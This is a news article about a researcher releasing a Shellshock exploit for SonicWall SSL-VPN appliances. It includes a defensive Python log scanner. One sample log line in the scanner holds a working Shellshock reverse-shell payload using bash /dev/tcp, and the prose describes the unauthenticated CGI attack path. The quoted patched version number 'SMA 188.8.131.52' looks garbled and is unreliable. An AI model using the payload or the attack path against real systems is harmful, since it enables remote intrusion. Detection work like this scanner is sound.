A former member of the infamous hacktivist collective Lulz Security (LulzSec) has published what he bills as a zero-day exploit for a popular SonicWall VPN product, which he says relies on the same vulnerabilities that the notorious hacktivist known as Phineas Fisher used to compromise the Italian spyware vendor Hacking Team and other companies.
On Monday, security researcher Darren Martyn published the exploit on his blog, after SonicWall revealed that hackers had breached its internal systems using a zero-day flaw in its remote access products.
“I’ve been sitting on this one for quite a while now, and figured what with SonicWall back in the news for getting owned via some 0days in their own s**t products, it would be somewhat amusing to release this,” Martyn wrote.
The researcher explained that SonicWall “Virtual Office” SSL-VPN products ship with an outdated version of Bash that is still vulnerable to Shellshock (CVE-2014-6271). Because the appliance's web server hands HTTP request headers to CGI scripts as environment variables, and a Shellshock-vulnerable Bash executes any command appended to a function definition found in an environment variable, a single crafted request to the /cgi-bin/jarrewrite.sh URL gives unauthenticated remote code execution, running as the unprivileged “nobody” user.
“The exploit is incredibly trivial. We simply spaff a shellshock payload containing a bash /dev/tcp backconnect at it, and we get a shell. Now, the environment on these things is incredibly limited – it’s stripped-down Linux. But we have bash, openssl, and FTP. So you could always download your own toolkit for further exploitation,” Martyn said.
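The chain described above (HTTP header to CGI environment variable to Bash function-definition parsing) is what a defender needs to recognise in access logs. The following is an added example written for this article, not code from the original post or from Martyn's exploit. It assumes an Apache/nginx "combined" log format, in which the User-Agent and Referer headers (the usual carriers of a Shellshock payload) are recorded; the log lines, IP addresses and timestamps are constructed samples, and the `jarrewrite.sh` path is the one named in the article.

```python
"""Shellshock detection helpers for CGI endpoints such as /cgi-bin/jarrewrite.sh.

Added example, not code from the article or from the published exploit.
Assumes combined log format; all sample log lines are constructed.
"""
import re
import subprocess

# The bash function-definition prefix "() {" that a Shellshock-vulnerable bash
# parses out of any environment variable; CVE-2014-6271 then runs whatever
# follows the closing brace.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# CGI script named in the article as the exposed, unauthenticated entry point.
WATCHED_PATHS = ("/cgi-bin/jarrewrite.sh",)

# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jan/2021:10:15:02 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"',
    '198.51.100.4 - - [25/Jan/2021:10:15:09 +0000] "GET /cgi-bin/welcome HTTP/1.1" '
    '200 8843 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Jan/2021:10:16:41 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '404 210 "() { :;}; echo probe" "curl/7.64"',
]


def cgi_env_from_headers(headers):
    """Show how a CGI gateway (RFC 3875) exports request headers to the script:
    the header name is upper-cased, '-' becomes '_', and 'HTTP_' is prefixed.
    This mapping is why a header value reaches bash as an environment variable."""
    return {"HTTP_" + name.upper().replace("-", "_"): value for name, value in headers.items()}


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Return a finding dict if the line carries a Shellshock-style payload, else None.
    Hits against the watched CGI path are 'critical'; elsewhere they are 'suspicious'."""
    rec = parse_combined(line)
    if rec is None:
        return None
    fields = [f for f in ("ua", "referer") if SHELLSHOCK_RE.search(rec[f])]
    if not fields:
        return None
    severity = "critical" if rec["path"] in WATCHED_PATHS else "suspicious"
    return {"ip": rec["ip"], "path": rec["path"], "fields": fields, "severity": severity}


def scan(lines):
    """Run classify() over an iterable of log lines and keep only the findings."""
    return [hit for hit in (classify(line) for line in lines) if hit]


def bash_is_shellshock_vulnerable(bash="/bin/bash"):
    """Classic local CVE-2014-6271 probe: a vulnerable bash executes the command
    that follows the function body in the PROBE variable and echoes VULNERABLE;
    a patched bash prints only 'probe'. Returns None if bash is not present."""
    env = {"PROBE": "() { :;}; echo VULNERABLE", "PATH": "/usr/bin:/bin"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    return "VULNERABLE" in out.stdout


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
    print("local bash vulnerable:", bash_is_shellshock_vulnerable())
```

The `severity` split matters operationally: a `() {` string in any header is worth an alert, but one aimed at a CGI script known to run under an unpatched Bash is the confirmed exploit attempt. The local probe is the same check administrators ran in 2014 and is safe to run on any host; it is independent of the appliance and only tells you about the Bash binary it is pointed at.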
The researcher deliberately withheld the details of how to escalate from the “nobody” user to administrative privileges on the SonicWall VPN, to prevent unskilled attackers from simply copy-pasting the exploit and using it in their own attacks.
Following publication of the exploit code, SonicWall said that the vulnerability the exploit relies on had already been patched years earlier.
“The vulnerability that this post is referencing was patched in 2015 in SMA 188.8.131.52. It cannot be exploited in version 9 or 10,” the company said in a message on Twitter.